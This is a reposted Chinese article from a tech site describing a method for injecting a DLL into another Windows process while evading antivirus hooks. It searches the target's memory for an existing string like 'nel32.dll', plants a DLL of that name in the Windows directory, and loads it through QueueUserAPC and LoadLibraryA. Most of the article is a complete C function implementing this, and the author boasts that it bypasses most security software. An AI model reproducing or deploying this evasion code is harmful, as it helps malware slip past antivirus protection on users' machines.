当前位置:七道奇文章资讯安全技术网络技术
日期:2009-06-14 18:05:00  来源:本站整理

绕过主动防备的代码注入办法[网络技术]

赞助商链接



  本文“绕过主动防备的代码注入办法[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
目前大大都的杀软都是hook NtWriteVirtualMemory和NtUserSethack58.net/" target=_blank>WindowsHookAW、NtUserSethack58.net/" target=_blank>WindowsHookE来避免代码注入.

关于代码注入Ring3层的办法主要有:

l 远程线程CreateRemoteThread

l 消息钩子Sethack58.net/" target=_blank>WindowsHookEx

l Ring3 APC QueueUserApc

l 改正线程上下文SetContextThread

此中第一种和第三种办法需求传入一个param,但是要求这个param必须在目标进程内存空间,之前的一些办法对比粗笨,直接在目标进程VirtualAllocEx内存,然后把但愿的参数内容写入这个内存,利用了WriteProcessMemory函数,而这个函数是被hook的,所以杀软可以很简单的拦阻代码注入行为.

细心想想,杀软的这种防备是很失利的!缘由是为了要一个param,攻击者完好没有必要做这么大的行动去目标进程内存空间申请内存并写内存,我在考虑能否可以不用WriteProcessMemory函数呢?反正我的目的就是得到一个公道的param,并且这个param是在目标进程内存空间便可!

考虑后,本来一切是这么简单啊,哈哈!乐了我半天~~~

举个例子:假定我是这样注入的:

QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)param) ;

我想让上面的param的内容是一个"xxx.dll",便可以了,并且要求这个param是在目标进程内存空间

您想到了么?哈哈

答案:直接在目标进程搜索一个这样的字符串"nel32.dll"便可以啦!因为"kernel32.dll" 这样的字符串是一定存在的,那么为了和"kernel32.dll" 不一样,那就随便利用一下"nel32.dll",大概"el32.dll",都是可以的啊!最后在往hack58.net/" target=_blank>windows目录下面撂进入一个nel32.dll,这样注入大部份杀软都是不能拦阻到的!哈哈!

写了段程序,做了个试验,仅测试了下趋向,完善绕过!其实杀软稍后测试...

DWORD EnumThreadandInjectDll(char *processName,HANDLE hProcess, DWORD dwProcessID,TIDLIST *pThreadIdList)
{
TIDLIST *pCurrentTid = pThreadIdList ;

const char szInjectModName[] = "nel32.dll";
DWORD dwLen = strlen(szInjectModName) ;

//////////////////////////////////////////////////////////////////////////
//不写目标进程的内存
//直接在目标进程中搜索出 nel32.dll 这样的字符串 并注入
//////////////////////////////////////////////////////////////////////////
int bufflen=30000;
char *buffer=(char *)malloc(sizeof(char)*bufflen);
DWORD dwNumberOfBytesRead;
DWORD defaultAddress;
//得到该进程的基址
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessID) ;
if(!hSnapshot)
{
   printf("CreateToolhelp32Snapshot error!\n");
   return 0;
}
MODULEENTRY32 me = { sizeof(me) };
    BOOL fOk =Module32First(hSnapshot,&me);
if(!fOk)
{
   printf("Module32First error!\n");
   return 0;
}
    for (; fOk; fOk = Module32Next(hSnapshot,&me))
    {
   printf("%s process module name = %s\n",processName,me.szModule);
        // 获得进程模块基址
   if(stricmp(me.szModule,processName)==0)
   {
    defaultAddress=(DWORD)me.modBaseAddr;
    printf("%s process module base = 0x%08X\n",processName,defaultAddress);
    break;
   }
    }
//搜索
if(!ReadProcessMemory(hProcess,(LPCVOID)defaultAddress,buffer,bufflen,&dwNumberOfBytesRead))
{
   printf("ReadProcessMemory error!\n");
   return 0;
}

for(int i=0;i<bufflen-dwLen;i++)
{
   if(strnicmp(buffer+i,szInjectModName,dwLen)==0)
   {
    printf("found nel32.dll already!... %s\n",buffer+i);
    while (pCurrentTid)
    {
     HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, pCurrentTid->dwTid) ;
    
     if (hThread != NULL)
     {
      //
      // 注入DLL到指定进程
      //
      QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)(defaultAddress+i)) ;
     }
    
     printf("TID:%d\n", pCurrentTid->dwTid) ;
     pCurrentTid = pCurrentTid->pNext ;
    }
    break;
   }
}

return 0 ;
}
  以上是“绕过主动防备的代码注入办法[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • 绕过主动防备的代码注入办法
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .